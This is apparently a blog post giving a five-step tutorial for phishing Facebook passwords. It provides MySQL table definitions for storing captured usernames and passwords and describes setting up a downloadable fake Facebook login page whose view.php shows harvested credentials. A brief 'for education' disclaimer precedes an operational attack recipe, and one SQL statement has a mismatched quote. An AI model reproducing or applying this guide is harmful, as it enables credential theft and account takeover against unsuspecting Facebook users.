5 Steps How To Hack Facebook Account Password


We want to remind you that this tutorial How to Hack Facebook Account and the downloadable file is free to use and the purpose is for education. we're not responsible for any misuse of this file.

Requirement:

1. Facebook Offline Page

2. MySQL Table Query(The MySQL Table For This tutorial)

 --
 -- Table structure for table `fb_fail`
 --

   CREATE TABLE IF NOT EXISTS `fb_fail` (
     `id` int(10) NOT NULL AUTO_INCREMENT,
     `uname` varchar(255) NOT NULL,
     `pwd` varchar(255) NOT NULL,
     `date` datetime NOT NULL,
      PRIMARY KEY (`id`)
      ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
      -- --------------------------------------------------------

  --
  -- Table structure for table `fb_login`
  --

   CREATE TABLE IF NOT EXISTS `fb_login' (
    `id` int(10) NOT NULL AUTO_INCREMENT,
    `uname` varchar(255) NOT NULL,
    `pwd` varchar(255) NOT NULL,
    `date` datetime NOT NULL,
     PRIMARY KEY (`id`)
     ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;

   --
   -- Dumping data for table `fb_login`
   --

5 Steps How To Hack Facebook Account Password

  1. Download the facebook offline file

  2. Inside the facebook.rar file there are 3 files (index.php, login.php, and view.php) you need to configure 2 of them (login.php and view.php) to match with your database server configuration.

  3. In this third step, you can view my previous tutorial about how to hack facebook account using phishing method.(see the post here)

  4. This is the fake facebook page interface preview screenshot using my browser.

  5. If someone logged in, we can view the harvested passwords in view.php page.

No comments:

Powered by Blogger.